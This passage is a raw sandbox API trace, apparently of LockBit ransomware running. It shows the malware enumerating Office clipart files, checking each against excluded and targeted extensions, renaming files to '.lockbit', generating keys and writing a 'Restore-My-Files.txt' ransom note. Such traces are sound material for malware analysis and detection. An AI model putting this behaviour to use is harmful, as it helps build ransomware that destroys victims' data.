param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.lockbit") returned 72 [0103.585] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00155_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x304 [0103.586] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.586] malloc (_Size=0x40068) returned 0x3e70008 [0103.586] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=11636) returned 1 [0103.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.586] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.586] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0103.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0103.587] ReadFile (in: hFile=0x304, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.645] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.645] malloc (_Size=0xa6) returned 0x77d800 [0103.645] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0103.645] free (_Block=0x77d800) [0103.645] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.645] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.645] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.645] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaaac100, ftCreationTime.dwHighDateTime=0x1bd4fa3, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfaaac100, ftLastWriteTime.dwHighDateTime=0x1bd4fa3, nFileSizeHigh=0x0, nFileSizeLow=0x57f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD00160_.WMF", cAlternateFileName="")) returned 1 [0103.645] lstrcmpiW (lpString1=".", lpString2="BD00160_.WMF") returned -1 [0103.646] lstrcmpiW (lpString1="..", lpString2="BD00160_.WMF") returned -1 [0103.646] PathFindExtensionW (pszPath="BD00160_.WMF") returned=".WMF" [0103.646] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.646] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.647] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.647] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD00160_.WMF") returned 1 [0103.647] lstrcmpiW (lpString1="ntldr", lpString2="BD00160_.WMF") returned 1 [0103.647] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD00160_.WMF") returned 1 [0103.647] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD00160_.WMF") returned 1 [0103.648] lstrcmpiW (lpString1="autorun.inf", lpString2="BD00160_.WMF") returned -1 [0103.648] lstrcmpiW (lpString1="thumbs.db", lpString2="BD00160_.WMF") returned 1 [0103.648] lstrcmpiW (lpString1="iconcache.db", lpString2="BD00160_.WMF") returned 1 [0103.648] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.648] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned=".WMF" [0103.648] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.648] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.648] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.649] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.649] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.lockbit") returned 72 [0103.649] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00160_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x304 [0103.662] CreateIoCompletionPort (FileHandle=0x304, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.662] malloc (_Size=0x40068) returned 0x1ff1e60 [0103.662] GetFileSizeEx (in: hFile=0x304, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=22516) returned 1 [0103.662] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.662] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0103.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0103.663] ReadFile (in: hFile=0x304, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0103.674] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.674] malloc (_Size=0xa6) returned 0x77d800 [0103.674] NtSetInformationFile (FileHandle=0x304, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.677] free (_Block=0x77d800) [0103.677] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.677] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.677] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.677] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcafbb900, ftCreationTime.dwHighDateTime=0x1bd4fa3, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcafbb900, ftLastWriteTime.dwHighDateTime=0x1bd4fa3, nFileSizeHigh=0x0, nFileSizeLow=0x3f34, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD00173_.WMF", cAlternateFileName="")) returned 1 [0103.677] lstrcmpiW (lpString1=".", lpString2="BD00173_.WMF") returned -1 [0103.677] lstrcmpiW (lpString1="..", lpString2="BD00173_.WMF") returned -1 [0103.678] PathFindExtensionW (pszPath="BD00173_.WMF") returned=".WMF" [0103.678] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.678] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.679] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.679] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD00173_.WMF") returned 1 [0103.680] lstrcmpiW (lpString1="ntldr", lpString2="BD00173_.WMF") returned 1 [0103.680] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD00173_.WMF") returned 1 [0103.680] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD00173_.WMF") returned 1 [0103.680] lstrcmpiW (lpString1="autorun.inf", lpString2="BD00173_.WMF") returned -1 [0103.680] lstrcmpiW (lpString1="thumbs.db", lpString2="BD00173_.WMF") returned 1 [0103.680] lstrcmpiW (lpString1="iconcache.db", lpString2="BD00173_.WMF") returned 1 [0103.680] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.680] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned=".WMF" [0103.680] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.680] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.680] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.681] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.681] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.lockbit") returned 72 [0103.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00173_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0103.682] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.682] malloc (_Size=0x40068) returned 0x3e70008 [0103.682] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=16180) returned 1 [0103.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0103.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0103.684] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0103.695] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.695] malloc (_Size=0xa6) returned 0x77d800 [0103.695] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.701] free (_Block=0x77d800) [0103.701] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.701] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.701] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.701] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f42f7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4354, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD05119_.WMF", cAlternateFileName="")) returned 1 [0103.701] lstrcmpiW (lpString1=".", lpString2="BD05119_.WMF") returned -1 [0103.701] lstrcmpiW (lpString1="..", lpString2="BD05119_.WMF") returned -1 [0103.701] PathFindExtensionW (pszPath="BD05119_.WMF") returned=".WMF" [0103.701] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.701] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.702] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.702] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.702] 